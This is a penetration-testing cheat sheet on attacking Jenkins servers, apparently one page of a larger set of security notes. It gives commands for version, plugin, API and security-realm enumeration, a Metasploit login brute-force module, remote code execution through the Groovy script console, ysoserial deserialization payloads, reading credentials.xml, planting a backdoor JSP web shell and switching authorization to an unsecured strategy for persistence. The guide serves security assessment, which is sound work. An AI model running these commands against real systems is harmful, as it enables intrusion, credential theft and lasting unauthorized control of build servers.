Attacking Jenkins - Focused Commands & Key Points

1. Jenkins Version Detection:

curl -I http://<target>:8080/

  • Check HTTP headers for Jenkins version.

nmap -sV -p 8080 <target_ip>

  • Nmap version detection.

curl http://<target>:8080/jenkins/cli/ | grep -i "Jenkins CLI"

  • Check for Jenkins CLI.

2. Jenkins Port Enumeration:

  • Default Ports:

    • 8080 (HTTP Web Interface)

    • 50000 (Slave Communication, often overlooked)

nmap -sV -p 50000 <target_ip>

  • Identify slave communication port.

3. Jenkins CLI Enumeration:

java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ help
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ list-plugins
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ list-jobs

  • Enumerate jobs, plugins, and users via Jenkins CLI.

4. Jenkins Plugin Enumeration:

curl http://<target>:8080/jenkins/pluginManager/

  • List installed plugins (common vulnerability source).

5. Jenkins Security Realm Enumeration:

curl http://<target>:8080/jenkins/configureSecurity/

  • Identify authentication methods (Jenkins DB, LDAP, etc.).

6. Jenkins API Enumeration:

curl http://<target>:8080/jenkins/api/
curl http://<target>:8080/jenkins/api/json

  • Identify API endpoints that might expose sensitive data.

7. Jenkins Access Control Enumeration:

curl http://<target>:8080/jenkins/configureSecurity/

  • Identify misconfigurations in access control settings.

8. Jenkins Exploitation:

  • Exploiting Weak Credentials

    • Check for default credentials (admin:admin, admin:password).

msf6 > use auxiliary/scanner/http/jenkins_login
msf6 auxiliary(scanner/http/jenkins_login) > set RHOSTS <target_ip>
msf6 auxiliary(scanner/http/jenkins_login) > run

  • Exploiting Script Console (Authenticated RCE)

java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ groovysh
println "Attacker Shell"

  • Gain RCE through Jenkins script console.

  • Exploiting Build Job Execution

curl -X POST http://<target>:8080/jenkins/job/test/build

  • Trigger a job execution for exploitation.

9. Jenkins Deserialization Vulnerabilities:

  • Use ysoserial to generate payloads.

java -jar ysoserial-all.jar CommonsCollections5 "<payload>" | base64

  • Inject payloads into vulnerable endpoints.

10. Jenkins Post-Exploitation & Persistence:

  • Extract Credentials from credentials.xml

cat /var/lib/jenkins/credentials.xml

  • Establish Persistence:

cp backdoor.jsp /var/lib/jenkins/jobs/

  • Modify Access Control for Future Access:

jenkins.security.AuthorizationStrategy$Unsecured

Key Takeaways:

  • Jenkins Manager Access: RCE via Jenkins Script Console.

  • Weak Credentials: Default or weak credentials often present.

  • Plugin Enumeration: Plugins are a frequent source of vulnerabilities.

  • Jenkins API Exposure: Can expose sensitive information.

  • Access Control Issues: Misconfigurations lead to privilege escalation.

  • Deserialization Attacks: Exploit Java deserialization vulnerabilities.

  • Web Shell Persistence: Deploy malicious JSP for long-term access.

By structuring this guide effectively, it serves as a powerful reference for Jenkins security assessment and penetration testing.

Previous8.-Attacking-tomcatNext3. Infrastructure and Network Monitoring Tools

Last updated